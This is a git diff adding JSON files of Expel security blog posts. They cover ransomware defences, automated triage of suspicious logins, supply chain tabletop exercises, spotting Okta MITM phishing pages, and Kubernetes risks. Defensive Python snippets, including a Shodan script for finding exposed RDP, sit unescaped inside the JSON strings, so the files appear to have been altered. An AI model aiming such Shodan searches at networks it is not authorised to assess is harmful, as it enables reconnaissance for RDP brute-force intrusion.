Once identified, the attacker will brute force a weak credential that allows authentication into the server. Then a ransomware payload is uploaded and executed on the machine. This type of attack is often automated and requires no human input to continue to infect thousands of vulnerable machines across the internet. Since this is a \u201cspray and pray\u201d approach, the goal here is to infect a large number of machines in hopes that a handful of them will end up paying a ransom, instead of targeting and identifying high-value targets. Targeted attacks Crafty attackers looking for a big payoff are starting to get more strategic, and are willing to play the long game to get ahold of important data that orgs can\u2019t afford to lose. This means that they\u2019re investing their time in targeting specific orgs (like the healthcare and financial industries) that have the potential to store sensitive data that can draw a large ransom. Targeted ransomware attacks usually also have a longer time to ransom, where the attacker may have broken in months earlier and implanted themselves into the network using a backdoor. Using this access, they may choose to perform reconnaissance and move laterally to a sensitive server before deploying the ransomware. This guarantees the data that will pay the highest ransom is in control of the attackers. We\u2019re noticing an increase in targeted attacks \u2013 and an increase in the amount of money they\u2019re demanding. In fact, Palo Alto\u2019s recent 2021 ransomware threat report shows that the amount of money attackers demanded in 2020 DOUBLED from the previous year. Bad actors taking advantage of a terrible and chaotic moment in time? Disappointed but not surprised. From our front lines, we recently saw a targeted campaign against the financial sector that deployed the GOOTKIT loader via a zipped JavaScript file. Once this payload was delivered, we observed the loader deploy a Cobalt Strike BEACON payload which eventually led to the attempted installation of REVIL ransomware. This narrative is becoming the standard for ransomware operations and allows for not only the installation of ransomware, but domain reconnaissance, credential theft and any other capability you would expect from a sophisticated actor. Six things to do right now to guard against a ransomware attack There are specific actions you can take in your environment today to better protect your org against a ransomware attack: Create and test backups regularly: Consider creating and testing backups of data within your org as part of your IT policy. Regularly creating valid backups that aren\u2019t accessible from your production environment will minimize business disruptions while recovering from ransomware attacks or data loss. The most important part? Test them. As a wise Tweet once said: Test your incident response plan: A real-life security incident isn\u2019t the best time to test your incident response (IR) plan. Give yours the stress test regularly \u2013 we recommend once a quarter \u2013 to make sure you and your team know what to do when a bad thing happens. Dare I say you can even make IR testing fun. We made it far more interesting by turning it into a game. You can read all about Oh Noes!, our IR tabletop game, and download your own starter kit right here. Disable RDP on Internet-facing systems: Don\u2019t expose RDP services directly to the internet. Instead, consider putting RDP servers or hosts behind a VPN that\u2019s backed by two-factor authentication (2FA). 
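If you want to script that exposure check across your own address space, here's a hedged sketch using the official shodan Python library (assuming you have a Shodan API key; the raw Shodan query it wraps is described in the next paragraph). The IP range and key below are placeholders, and you should only point this at IP space you own or are authorized to assess.

```python
# Hedged sketch of automating the RDP exposure check from this tip, using the
# official `shodan` Python library (pip install shodan). The API key and CIDR
# below are placeholders. Only scan IP space you own or are authorized to assess.
import shodan

API_KEY = "YOUR_SHODAN_API_KEY"   # placeholder, not a real key
YOUR_CIDR = "198.51.100.0/24"     # documentation range; substitute your public IP space
RDP_PORT = 3389                   # adjust if you run RDP on a non-standard port

api = shodan.Shodan(API_KEY)
try:
    results = api.search(f"port:{RDP_PORT} net:{YOUR_CIDR}")
    matches = results.get("matches", [])
    for match in matches:
        # Each match describes a host Shodan observed answering on the RDP port
        print(f'{match.get("ip_str")}:{match.get("port")} - {match.get("org", "unknown org")}')
    if not matches:
        print("No exposed RDP found in the supplied range.")
except shodan.APIError as err:
    print(f"Shodan query failed: {err}")
```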
Want to know if you have RDP exposed in your organization? Here\u2019s a Shodan query that can help: port:3389 net:1.2.3.4/24 (where 1.2.3.4 is your public IP space in CIDR notation). If RDP is running on a non-standard port in your organization, adjust port:3389 to the non-standard port number. MFA everyone: Multi-factor authentication (MFA) isn\u2019t your silver bullet for stopping a ransomware attack, but it\u2019s still an important part of your security strategy. Add another layer of defense to your org and implement MFA (like Duo or Okta) for everyone. Configure WSH files to open in Notepad: Prevent the double-clicking of evil JavaScript files and configure JScript (.js, .jse), Windows Scripting Files (.wsf, .wsh) and HTML for application (.hta) files to open with Notepad. By associating these file extensions with Notepad, you\u2019ll mitigate common remote code execution techniques. Pro tip: PowerShell files (.ps1) already open by default in Notepad. Want to test how these files currently open in your environment? These steps work great! Block Microsoft Office Macros: Prevent a user from accidentally running a malicious Office macro. Macros are one of the most common ways an attacker attempts to \u201ctrick\u201d a user into running malicious code that can be used to install malware. This is most commonly seen in phishing attacks, where an attacker will send a seemingly legitimate Microsoft Office document for the user to open. This creates an easy vessel for ransomware delivery if macros are allowed across an enterprise. Not sure what your macro policies currently are set to? Check out the Trust Center Settings in Microsoft Office and adjust appropriately for your organization. We recommend: Better: Disable all Office macros except those that are digitally signed. Best: Disable all Office macros." +} \ No newline at end of file diff --git a/spotting-suspicious-logins-at-scale-alert-pathways-to.json b/spotting-suspicious-logins-at-scale-alert-pathways-to.json new file mode 100644 index 0000000000000000000000000000000000000000..e7dbdbdbad5976142f89eea69f3e57ddc3aefd0a --- /dev/null +++ b/spotting-suspicious-logins-at-scale-alert-pathways-to.json @@ -0,0 +1,6 @@ +{ + "title": "Spotting suspicious logins at scale: (Alert) pathways to ...", + "url": "https://expel.com/blog/spotting-suspicious-logins-at-scale/", + "date": "Jun 2, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Spotting suspicious logins at scale: (Alert) pathways to success Security operations \u00b7 8 MIN READ \u00b7 JON HENCINSKI AND PETER SILBERMAN \u00b7 JUN 2, 2020 \u00b7 TAGS: Get technical / Managed detection and response / Security Incident / SOC / Vulnerability Spoiler alert: We improved the median time it takes to investigate and report suspicious login activity by 75 percent between October 2019 and March 2020. We did it by reviewing the investigative patterns of our SOC analysts and deploying a ton of automation to enable our team to answer the right questions quickly. You\u2019ll see in the chart below that we\u2019ve managed to reduce the time it takes to investigate a suspicious login to a matter of minutes over that six-month period. We\u2019re showing the median and 75th percentile here. TL;DR: Line goes up, more time spent. Line goes down? Efficiency FTW! Time to investigate a suspicious login alert Wondering how we turn repetitive tasks into SOC efficiency? 
We\u2019ll walk you through our view of SOC operations and the key metrics we use to understand where we\u2019re spending too much analyst time on things we should hand off to our robots. But first we\u2019ll take you through how we deployed decision support to reduce the challenge of triaging suspicious login alerts (these can be such a pain if not done correctly, amiright?). What\u2019s decision support? First things first: Decision support is how we use tech to enable our SOC analysts to answer the right questions about a security event in an easy way. In doing so, we reduce cognitive loading and hand off the highly repetitive tasks to automation (AKA our robots). It\u2019s also a key component of how we make sure our analysts aren\u2019t oversubscribed. Pro tip: If you ever go on a SOC tour and the first thing you notice is a lot of sticky notes (hopefully not with passwords on them), that\u2019s the opposite of decision support. At Expel decision support is made up of four key components: Automation Contextual enrichment (especially important in the era of cloud automation) Investigation orchestration User interface attributes How do you build decision support? The bottom line is this: Start by understanding where the team needs the most help, now. What we mean by that is to figure out the class of alerts that takes the team the longest time to investigate. Do you see any patterns? Is the team asking the right questions? You may need to deploy metrics first. Expel believes that effective investigations are rooted in the quality of questions asked, so we look for where our analysts are asking the same great questions over and over again. For example, analysts may find themselves continuously asking questions like: Where has this user previously logged in from? At what times does the user normally log in? And guess what machines are good at? Yup \u2013 doing the same thing over and over without a break. It really helps to have good SOC metrics and instrumentation in place before you start down this path. Be strategic by defining where you want to get to and measuring it. Look at metrics and build a cadence around it. Keep in mind that finding great SOC metrics doesn\u2019t have to be a complicated endeavor. You just need a group of people sitting down and understanding what\u2019s happening. If you do this, you\u2019ll be in the best position to answer which class of investigation takes the team the longest, and what steps you can automate to make life easier for the team. That said, resist the urge (and encouragement by some) to automate all the things before you have metrics and understand what it\u2019s like to do those activities manually. To help you calibrate, below is a high-level diagram of our own alert management process. Expel SOC system diagram And here are some Cliff\u2019s notes on how to interpret the diagram above: There are six paths. Each path contains a percentage of the capacity utilization for the month recorded. Robots: You\u2019ve heard us mention our robots in previous posts. We ingest security signals from a wide variety of tech and process those events through our detection engine (you\u2019ll notice in the diagram above that we\u2019ve named this robot Josie). Triage: Security events that match specific criteria generate an alert that is sent to a SOC analyst for human judgement. You see in that diagram that 50 percent of the capacity we utilized was spent here for the month recorded.
An alert can take one of three paths: Close: The alert is a false positive. Nothing to see here. I can also mark when \u201cTuning\u201d is required on an alert. Incident: The alert is a true positive. Move to incident and respond. Investigate: After looking at the alert, I\u2019m not sure. I need additional data before I make a call. An Investigation can take one of two paths: Close: After additional investigating, the alert was in fact a false positive. Notify: After additional investigating, the activity in question is suspicious enough that we\u2019d want to tell a customer about it. We then have a set of metrics for each phase. Some of the metrics are the usual suspects, like the time between when an alert is fired and when an analyst picks it up. But when we\u2019re looking for decision support opportunities there are two metrics that we zoom in on: What\u2019s the percentage of alerts, based on the alert type, that move to the investigate bucket? Recall our SOC diagram above. We\u2019re examining the pathway of alerts. Do we move \u201cSuspicious Login\u201d alerts to the investigation bucket 50 percent of the time? This suggests that there\u2019s not enough information in the alert to make a call. We then ask: What information is needed? Can we use the data available from various vendors to decorate the alert so that it can be handled in the \u201ctriage\u201d bucket? Or can we use orchestration to go and fetch that one piece of evidence we need to make a call? We optimize triage for speed, efficiency and accuracy because that\u2019s where we spend most of our time. It\u2019s also a key way we reduce cognitive loading on our SOC analysts. When we move a class of alert to the investigation bucket, how long does it take for the SOC to complete it? We\u2019re talking about investigation cycle time. If it\u2019s taking us more than an hour to complete the investigation into a class of activity, what steps can we automate to improve these times? We\u2019ll go and review the investigations to see what steps our analysts are taking. Once we spot a pattern \u2013 and confirm it\u2019s the right one \u2013 we\u2019ll hand the work off to our robots to do it for us. Note that we never put a timer on our analysts. If it takes us more than an hour to investigate a class of activity, we use data to spot it and then lead with tech to improve our cycle times. Finally, we review the metrics weekly to monitor progress and spot areas where we need additional tech to improve. Case Study: Suspicious Logins Time to put all of this into practice. Remember to keep our two key metrics in mind \u2013 high likelihood to move to \u201cinvestigate\u201d and time spent on investigation. We spotted suspicious logins to applications/consoles in the cloud (things like O365 and AWS console authentications). As any security analyst knows, this is a class of alert that\u2019s particularly painful. What makes up a suspicious login? To keep things simple, it\u2019s a class of alerts where an authentication is flagged based on context we have from the customer (for example, customers tell us where they have employees). We also take into account things like whether it\u2019s from a known suspicious region, or whether it\u2019s perhaps being accessed through a VPN.
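For illustration, here's roughly what that kind of context-based flagging looks like in code. This is a minimal Python sketch, not Expel's actual detection logic; the expected-country set and VPN egress list are hypothetical stand-ins for the customer context described above.

```python
# Minimal, illustrative sketch (not Expel's actual detection logic): flag a
# cloud console login as "suspicious" when it comes from a country the customer
# hasn't told us to expect and isn't coming through a known VPN egress point.
from dataclasses import dataclass


@dataclass
class Login:
    user: str
    source_ip: str
    country: str       # assumed to be enriched upstream via GeoIP
    succeeded: bool


def is_suspicious(login: Login,
                  expected_countries: set[str],
                  known_vpn_egress_ips: set[str]) -> bool:
    """Return True if the login deserves a human look."""
    if login.source_ip in known_vpn_egress_ips:
        return False  # traffic through an authorized VPN/egress point is expected
    if login.country not in expected_countries:
        return True   # customer told us they have no employees there
    return False


# Example: a customer with employees only in the US and Canada
context = {"US", "CA"}
vpn_ips = {"203.0.113.10"}  # documentation-range IP, purely illustrative
print(is_suspicious(Login("alice", "198.51.100.7", "AW", True), context, vpn_ips))  # True
```

A rule this simple errs on the side of flagging too much, which is exactly why the alerts it produces need human review and decision support behind them.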
It\u2019s important to note that because our analysts are reviewing the alerts, our willingness to open the aperture of what makes a login suspicious is higher than if we were simply tossing alerts over the fence for our customers to review (which is the opposite of what Expel does). Here\u2019s an example where O365 recorded a failed login from a foreign country due to a conditional access policy: Expel alert for suspicious login pre-optimization Just like any other alert, this is a collection of observations that something may be amiss. Does this tell us anything special? Nope. Let\u2019s see if we can answer some of the right questions based on the class of activity using only the evidence within the alert: Key question Able to answer just based on the alert? 1. Where has this user previously logged in from? No. 2. What other accounts has this IP logged into? Were they successful? No. 3. Is this user based out of Aruba? Did they forget to authenticate to the corporate VPN before logging into O365? No. Can we answer key questions by looking at the alert? We sure can\u2019t. And so unsurprisingly, a high percentage of alerts related to suspicious login activity were making their way to our investigation bucket. Further, when we examined our alert pathway metrics for suspicious login alerts, they told us that roughly half the time our analysts ended up querying SIEM logs and performing other manual steps to answer key questions. Below are the alert pathways of interest for Suspicious Logins alerts from May 2019: Alert pathway % of alerts following pathway (pre automation) Alert-to-close 61% Pursue as investigations 39% As a next step we examined suspicious login investigations for patterns. We wanted to answer this question: When we move a suspicious login alert to an investigation, what steps are we taking? You can imagine that we were spending a ton of time querying logs in a SIEM to answer the same questions over and over again. We noticed we were spending a ton of time answering the following: Where did the user log in from last? What\u2019s the IP usage type for the source IP address? At what times does the user normally log in? Where has this user previously logged in from? What user-agent was previously observed for this user? What other accounts has this IP logged into? Were they successful? What\u2019s the user\u2019s role? Are they a member of any groups that could indicate they travel? Do they typically use a VPN? If so, which ones have we seen? So, the conclusion we arrived at was that if these are the questions we need to answer to make sure we\u2019re making the right decision, we\u2019ll bring this info to the alert automatically. As soon as the alert is generated, our robots (investigation orchestration) will pick it up, grab the data and present it as decision support. Our SOC analysts focus their efforts on making judgement calls and spend less time grepping through a SIEM. Now when a suspicious login alert fires, instead of only presenting the evidence from the alert, we use automation to add lots of decision support: Expel alert for suspicious login post-optimization What work do we automate? When a suspicious login alert fires, our robots go and grab: A user authentication histogram that shows at what times a user is normally observed logging in over the past 30 days.
A user login activity map that shows the geolocation of previous successful logins, unsuccessful logins and the current login for the user in a weighted bubble map over the past 30 days. A summary of authentication attempts (success and failure) from the source IP address recorded in the alert. A login frequency summary for the user based on region. This shows how often the user is logging in from different IP addresses and the frequency of those logins A user agent summary. This shows the user-agents recorded for the user over the past 30 days. Our robots also grab user details from O365 or G-Suite and MFA device activity to arm our analyst with more context. By asking the right questions and then handing the heavy lifting off to our robots, most suspicious login alerts can be triaged in a matter of minutes. Here are the post automation alert pathway stats for May 2020. Alert pathway % of alerts following pathway (post automation) Alert-to-close 86% (+25%) Pursue as investigations 14% (-25%) We\u2019ve made a once painful class of alerts much easier to handle and that\u2019s a great outcome for our SOC analysts and our customers. Parting Encouragement Ask the right questions; achieve the desired result. That\u2019s why we created decision support. It makes it super easy to answer the right questions. Remember, decision support is not sticky notes. It starts with a group of people sitting down and understanding what\u2019s happening and where we need to adjust. It really helps to have good SOC metrics in place before you start down this path. Draw the big picture and start to zoom in on areas where you think the team might be struggling." +} \ No newline at end of file diff --git a/supply-chain-attack-prevention-3-things-to-do-now.json b/supply-chain-attack-prevention-3-things-to-do-now.json new file mode 100644 index 0000000000000000000000000000000000000000..1235538d1aebc6a4f932a557014ef791ed89c056 --- /dev/null +++ b/supply-chain-attack-prevention-3-things-to-do-now.json @@ -0,0 +1,6 @@ +{ + "title": "Supply chain attack prevention: 3 things to do now", + "url": "https://expel.com/blog/supply-chain-attack-prevention-3-things-to-do-now/", + "date": "Jan 11, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Supply chain attack prevention: 3 things to do now Threat Intelligence \u00b7 6 MIN READ \u00b7 BRUCE POTTER \u00b7 JAN 11, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools You can\u2019t trust the internet. As a security professional, you\u2019ve likely figured that out already. But it turns out that we do place a lot of trust in the software and services we access each day. We expect them to: Provide us with the functionality we want; and Function properly (without allowing bad things to happen) At the core, this is what we mean when we talk about integrity of a computing platform. It should only do what we intend and not things we don\u2019t intend. For instance, if I have an enterprise monitoring system, I expect it to do appropriate monitoring of things and not provide a backdoor for external threat actors to access my network. That\u2019s the nature of what happened in the SolarWinds Orion incident , and there are many similar examples of other supply chain incidents that have left security professionals everywhere reeling. 
Sure, we\u2019ve all built abstractions such as security assessments and third-party risk management programs to attempt to manage the potential risks associated with our systems, but the reality is that the fate of our enterprises is often in other people\u2019s hands. When we think about cyber attacks, we often wonder: \u201cWhat if I\u2019m attacked?\u201d But this recent cyber attack reminds us that we also need to ask: \u201cWhat if I lose trust in the tech I rely on to keep my org safe?\u201d Let\u2019s talk about what we do at Expel to prepare for moments when trust is broken, how I think this translates to what we\u2019ve observed and learned from the SolarWinds Orion breach and what you can do to be prepared against supply chain attacks in the future. How to prepare for a supply chain attack: Run a tabletop exercise There\u2019s a common pattern with threat actors: they pick out a target, phish them, get access and then carry out their nefarious deeds. It might be ransomware, it might be data theft or it might be for intelligence purposes. Whatever the reason, one thing\u2019s for sure: you\u2019re the target and you have to deal with the consequences. But what if a provider that a large percentage of the internet relies on is compromised? These types of attacks have dramatically different impacts on an organization and the response can be very different from what\u2019s covered in a standard incident response (IR) plan. To prepare for this type of situation, Expel runs tabletop exercises periodically. The particular simulation I\u2019m thinking of is one in which we presented that CircleCI went out of business. (For those who aren\u2019t familiar, CircleCI is a SaaS solution that helps developers integrate and deploy code in a streamlined and automated way, and claims over 30 thousand customers running over a million builds a day.) Note that during these simulations, I give incomplete information. During this exercise, the facts presented to the team led them to believe that CircleCI hadn\u2019t gone out of business but had in fact been completely compromised. Being the good facilitator I am, I let the team run with that idea, and the results were pretty fascinating. To be clear, this was a simulation \u2013 CircleCI, of course, did not go out of business. The key in creating an effective exercise is to make up a scenario that would wreak havoc on your org so that every team member gets a chance to both think creatively and flex their IR muscles. And that\u2019s what I did here. After we got over the \u201coh no\u201d moment of knowing the CI provider was compromised, we had to grapple with the impact an attack like this could potentially have. Not only could we not trust our code running in production, but we couldn\u2019t trust the code running in production for any of CircleCI\u2019s 30 thousand customers. That\u2019s a big problem \u2013 CircleCI has a lot of big brand customers like Docker and Facebook, as well as SaaS solutions of all shapes and sizes around the world. We faced a situation where we could no longer trust the Internet in the way we had; not for production services, not for productivity solutions, not for back office systems. The problem for the team became, \u201chow do we continue to deliver Expel\u2019s services in this new reality?\u201d The discussions during the tabletop around business continuity, communications and customer interactions were unlike any we had had in previous tabletops.
We focused on: Figuring out where trustworthy artifacts existed in order to reconstitute our production environment from scratch. From there, we examined what external services we were willing to continue to use and what services we had to walk away from immediately. Rearchitecting the entire production environment on the fly in an attempt to keep our service viable while ensuring our customers\u2019 networks weren\u2019t in jeopardy. If anyone from CircleCI is reading this, hi! We love you and wish your team well. This was just a tabletop and not at all a reflection of how we view CircleCI\u2019s security program. A look at how supply chain attacks are evolving: SolarWinds Orion Fast forward from when we ran our CircleCI simulation to December 2020, and we were faced with a similar real-life example with SolarWinds Orion. While not quite the same as having your CI provider popped, it still had the potential to impact enough organizations at a deep enough level that we nearly experienced a \u201ccan\u2019t trust the Internet\u201d moment. While it looks like a relatively small number of companies had direct malicious actions against them, the cybersecurity community is still sorting it all out. But many of us are in fact reflecting on the trust we put in our providers, software and hardware. With so many unknowns about which companies and agencies are compromised and the current state of those networks, rethinking what services we rely on and where our data lives means having discussions with businesses we\u2019ve never had before. Contrast this to the attacks we saw in the 2010 timeframe. Both the Google Aurora-style attacks as well as attacks against the Defense Industrial Base (DIB) were well coordinated and sophisticated. These were also highly targeted attacks launched against high-value organizations, and they subverted trust in the core systems of many of these enterprises. Having dealt with some of those intrusions personally, I will say recovery from them was difficult and expensive for many organizations and resulted in large scale changes in how they thought about security. What we\u2019re seeing in 2020 is much different. For starters, the impact of the SolarWinds Orion hack isn\u2019t targeted in the same way. Rather than having a few providers to worry about, we have 18 thousand that may have been compromised. So thinking about reducing exposure to this attack has a very different feel than what we dealt with in 2010. On the flip side, we have much better security signal now than we had in 2010. Endpoint monitoring and interrogation technology has improved dramatically. For cloud based workloads, we have the ability to introspect on them from underneath. For example, services like CloudTrail and GuardDuty from Amazon Web Services (AWS) give us simple, detailed information about what is executing where and provide high fidelity detections. Unlike 2010 \u2013 when even knowing bad actors were in the network, we often couldn\u2019t find them \u2013 better instrumentation helped many of the 18 thousand impacted companies take publicly available information about these attacks and rapidly determine either \u201cyep, we were compromised\u201d or \u201cseems pretty unlikely we were compromised\u201d. Being 100 percent sure is not possible, but today we can have a much higher degree of assurance than we could in the past. 3 things you can do right now to better protect your org against a supply chain attack The impact of the SolarWinds Orion hack will be felt for years to come.
This is a somewhat rare event that causes organizations to lose trust in many systems and services all at once. However, it\u2019s critical we use this time to learn lessons and prepare for the next large scale event that causes us to question the integrity of huge swaths of the Internet. Because it\u2019s a given that we will have another one of these moments. It\u2019s possible to prepare for these events, but it requires a different kind of response than what you might normally plan or table-top for. Here are some things you can do: Plan for supply chain attacks \u2013 The word \u201csupply chain\u201d can mean different things to different orgs, but for many tech companies, your supply chain is a long list of cloud services that facilitate your day-to-day business. Have plans for alternative supply chain providers \u2013 We\u2019re not saying you need to have a hot backup for all your cloud services. But you should at least plan for potentially rapid provider shifts if a catastrophic event happens. This should be largely in line with your business continuity plans (which you\u2019ve tested, right?). Be creative \u2013 Failures of imagination are a real thing. And it can be very difficult to dream up attacks like SolarWinds Orion or vulnerabilities like Heart Bleed. When planning tabletops, ask people around your company: \u201cWhat\u2019s the worst thing that could happen?\u201d You might be surprised at the scenarios others are worrying about." +} \ No newline at end of file diff --git a/swimming-past-2fa-part-1-how-to-spot-an-okta-mitm.json b/swimming-past-2fa-part-1-how-to-spot-an-okta-mitm.json new file mode 100644 index 0000000000000000000000000000000000000000..040cb886625277f2208a256c649b850ae83cb621 --- /dev/null +++ b/swimming-past-2fa-part-1-how-to-spot-an-okta-mitm.json @@ -0,0 +1,6 @@ +{ + "title": "Swimming past 2FA, part 1: How to spot an Okta MITM ...", + "url": "https://expel.com/blog/2fa-part-1-how-to-spot-okta-mitm-phishing-attack/", + "date": "Jul 13, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Swimming past 2FA, part 1: How to spot an Okta MITM phishing attack Security operations \u00b7 4 MIN READ \u00b7 JOSHUA KIM, EVAN REICHARD AND ASHWIN RAMESH \u00b7 JUL 13, 2021 \u00b7 TAGS: Cloud security / MDR Credentials phishing attacks are on the rise and bad actors are finding new and creative ways to bypass multi-factor authentication (MFA). This trend isn\u2019t surprising \u2013 a large percentage of people abruptly switched to remote work last year. And attackers didn\u2019t waste time in taking advantage of the upheaval. We\u2019ve noticed that one multi-factor authentication solution in particular caught the eye of attackers \u2013 Okta. Why Okta? Orgs that use Okta rely on its authentication and access management feature to grant users access to their apps. This is the holy grail for a threat actor, giving them a one-stop shop to access multiple apps that can be used to stage an attack or exfiltrate data. We sounded the alarm about this trend in an infographic . But what do these types of attacks look like? Missed the infographic? Click here. That\u2019s what we\u2019re going to cover here. In this two-part blog series, we\u2019re going to share an example of an Okta phishing attack that we responded to in our security operations center (SOC). The attacker used a man-in-the-middle (MITM) tactic to send users to a fake Okta login page. 
This post will go over how we detected that a user\u2019s credentials were compromised, how you can spot a phony Okta page and we\u2019ll share some tips on how your org can stay resilient against these types of attacks. We\u2019ll follow up with a deep dive into our investigative process in the second part of this series \u2013 so stay tuned! Phishing for credentials So, what happened? Attackers emailed a link to a fake Okta login page from the email service provider, SendGrid. If a user submitted their credentials using the fake Okta page, they were redirected to a page masquerading as the Duo Security MFA page that was hosted by the attacker. While the org had configured two-factor authentication (2FA), the attacker\u2019s phishing campaign and social engineering successfully circumvented existing security controls by hijacking the user\u2019s authenticated network sessions. Spotting a fake Okta page The fake Okta login page mirrored settings of the users\u2019 workplace, like the org\u2019s logo, and was convincing enough to leave them unaware that they weren\u2019t logging into their normal login page. But there were some telltale signs that this was a phishing attempt. Let\u2019s look at the fake login and two-factor authentication pages that were created. Do you notice anything strange? The fake Okta login and two-factor pages. Once we started our investigation, here are some things we noticed right off the bat: The attacker-owned phishing site was using the non-secure HTTP over HTTPS. The attacker-owned site didn\u2019t render the security image or the default avatar picture when entering a username. The \u201cRemember Me\u201d option was missing the checkbox. The attacker used similar but not exactly the same language on their page. The attacker-owned site said \u201cNeed sign-in assistance?\u201d while a real Okta page reads \u201cNeed help signing in?\u201d The bottom left hyperlink should state, \u201cPowered by Okta\u201d not \u201cOktaPowered by.\u201d Other things seemed off, and we noted minor details like different font style and sizes between the respective texts. Detecting Duo malicious logins During initial triage, we started to dig into how the user\u2019s credentials were compromised. We noticed that there were two devices (and their IP addresses) in the Duo Authentication Logs associated with a Duo Push Authentication event: Access Device \u2013 The device from which the user is requesting the Duo Push. Authentication Device \u2013 The device approving or rejecting the Duo Push. For a legitimate authentication event, we can assume that the access device and the authentication device are in close proximity to each other, and since we have the IP addresses of both devices, we can build a detection off this assumption. An example SIEM query-based rule is provided below. SIEM query-based rule The first step was to get a geographical location from the IP addresses. We did this by enriching the IP addresses using SumoLogic\u2019s geo://location operator. This gave us the latitude, longitude and the country codes of both IP addresses. We then used an additional SumoLogic feature called haversine , which allows us to determine the birds-eye distance between two geographical coordinates. Finally, using the newly derived distance and country of origin for both the access and authentication device, we can generate an alert if the countries differ or if the distance between the two devices exceeds a determined length. 
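The production version of this detection runs as a SIEM query using SumoLogic's geolocation and haversine operators, but the underlying logic is simple enough to show in a few lines. Here's a minimal Python sketch of the same idea, assuming the access and authentication device IPs have already been enriched with latitude, longitude and country code, and using an arbitrary distance threshold you'd tune for your own environment.

```python
# Minimal sketch of the detection logic described above (the production version
# runs as a SIEM query; this is only an illustration). Assumes the access and
# authentication device IPs were already enriched with lat/lon and country.
from math import radians, sin, cos, asin, sqrt

EARTH_RADIUS_KM = 6371.0


def haversine_km(lat1, lon1, lat2, lon2) -> float:
    """Great-circle ('birds-eye') distance between two coordinates, in km."""
    phi1, phi2 = radians(lat1), radians(lat2)
    dphi = radians(lat2 - lat1)
    dlmb = radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(phi1) * cos(phi2) * sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def should_alert(access_geo, auth_geo, max_km: float = 500.0) -> bool:
    """Alert when the Duo access and authentication devices look too far apart.

    Each *_geo argument is (latitude, longitude, country_code); max_km is an
    arbitrary threshold you'd tune for your own environment.
    """
    alat, alon, acountry = access_geo
    blat, blon, bcountry = auth_geo
    if acountry != bcountry:
        return True
    return haversine_km(alat, alon, blat, blon) > max_km


# Example: access device in Virginia, Duo push approved from a device in Aruba
print(should_alert((38.9, -77.0, "US"), (12.5, -69.9, "AW")))  # True
```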
This doesn\u2019t mean that there aren\u2019t false positives. Some organizations use various VPNs/proxies that could cause a legitimate login to appear illegitimate. For example, if the user happens to be using a VPN on their phone or authentication device, it could fire an alert if the devices aren\u2019t recognized. At Expel, we\u2019re able to mitigate some of the false positives by hooking this detection into a context database. This allows us to suppress the alert if one of the IP addresses is originating from a known and authorized VPN or network egress point. 4 tips on how you can prevent credentials phishing While the tried and true methods of phishing attacks, like business email compromise (BEC), persist \u2013 phishing tactics are getting more sophisticated. And we\u2019ll likely see more instances of phishing or credentials phishing similar to this attack in the future. Beyond implementing best security practices for Okta (enabling MFA, network blocklisting, enforcing complex passwords, enabling email notifications for end users and device trust), updating your security awareness training when a new type of attack is identified can help reduce your phishing triage-related headaches. There are four things that you can share with your employees to ensure they don\u2019t fall victim to this type of attack: Enforce MFA prompts when users connect to sensitive apps via app-level MFA. Don\u2019t make your Okta a one-stop shop for an attacker. Protect your sensitive apps with additional MFA to help add another layer of defense. Remind your users to make note of and remember the security image tied to their Okta account on the sign in page. If your users don\u2019t see or recognize their chosen security image, they might be on a fraudulent page. Tell your users to always review the source of the 2FA request (if via push notification) to verify if the login is from the expected region/area. If they get an unexpected login request, encourage them to report the event. They can do that either by email or using the reporting features within the 2FA mobile app. Customize your Okta sign-in page appearances. Believe it or not, we\u2019re pretty good at pattern recognition. When implemented, if a user lands on a default Okta sign-in page with no customization, it may help trigger their spidey-sense and let them know that something isn\u2019t right. This incident serves as a reminder that we always need to stay sharp and think twice before clicking a link or hitting that sign-in button. Find out what Expel looks for when a phishing email is submitted" +} \ No newline at end of file diff --git a/tell-dr-kubernetes-where-it-hurts-expel.json b/tell-dr-kubernetes-where-it-hurts-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..3733aac5f1edea3f83df2c59c8d00b14e2b6e37e --- /dev/null +++ b/tell-dr-kubernetes-where-it-hurts-expel.json @@ -0,0 +1,6 @@ +{ + "title": "Tell Dr. Kubernetes where it hurts - Expel", + "url": "https://expel.com/blog/tell-dr-kubernetes-where-it-hurts/", + "date": "Jan 26, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Tell Dr. Kubernetes where it hurts Security operations \u00b7 2 MIN READ \u00b7 DAN WHALEN \u00b7 JAN 26, 2023 \u00b7 TAGS: Cloud security Let\u2019s start with some numbers: The container application market is expected to grow to $12 billion by 2028 (a compound annual growth rate [CAGR]) of >33%. Kubernetes (k8s) will drive a majority of the expansion. 
The container and Kubernetes security market projects to grow to $8.2B by 2030 (27.4% CAGR from 2021-2030). 96% of respondents to a 2021 Cloud Native Computing Foundation (CNCF) survey reported using or evaluating k8s. A RedHat survey found that 85% of IT leaders consider Kubernetes to be important or extremely important for their business. In other words, Kubernetes is exploding (in a good way). And for important reasons. It saves money. It improves DevOps efficiency. Workloads can be deployed in multicloud environments. It affords more portability and minimizes vendor lock-in. K8s schedules and automates container deployment across multiple compute nodes. It promotes app stability and availability in the cloud. And it\u2019s fully open-source. As is the case for many (most? all?) new technologies, though, Kubernetes faces growing pains. That same RedHat report noted that 55% of DevOps, engineering and security teams had delayed applications because of security concerns and 93% experienced at least one security incident in their k8s environments in the last year. Top Kubernetes pain points Our customers have walked us through a number of issues they encounter, and three stand out. 1: Lack of coverage for Kubernetes environment. K8s applications are increasingly popular with application developers, but SecOps teams need coverage for every app, endpoint, network, and more \u2013 a huge requirement. With the rapid adoption of container applications through Kubernetes, these businesses now have a significant number of workload applications that aren\u2019t proactively monitored \u2013 if they\u2019re monitored at all. 2: Security as a business inhibitor versus enabler. No, this one isn\u2019t unique to k8s \u2013 the war between business and security seems old as time. And the basic dynamics make sense. Organizations want to innovate, move fast, and grow. Security teams want to prevent Bad Things\u00ae from happening. Unfortunately, when cybersecurity is perceived as a drag on the business, the business often counters by circumventing security \u2013 which brings us back to Bad Things\u00ae. In the case of Kubernetes, developers are deploying container apps and security isn\u2019t monitoring them. When security isn\u2019t integrated from the start, the entire business is exposed to significant risk. 3. Growing attack surface with limited security expertise. Another not-new problem made worse by k8s: hiring and retaining talent, something that has plagued the cybersecurity industry for a long time. The 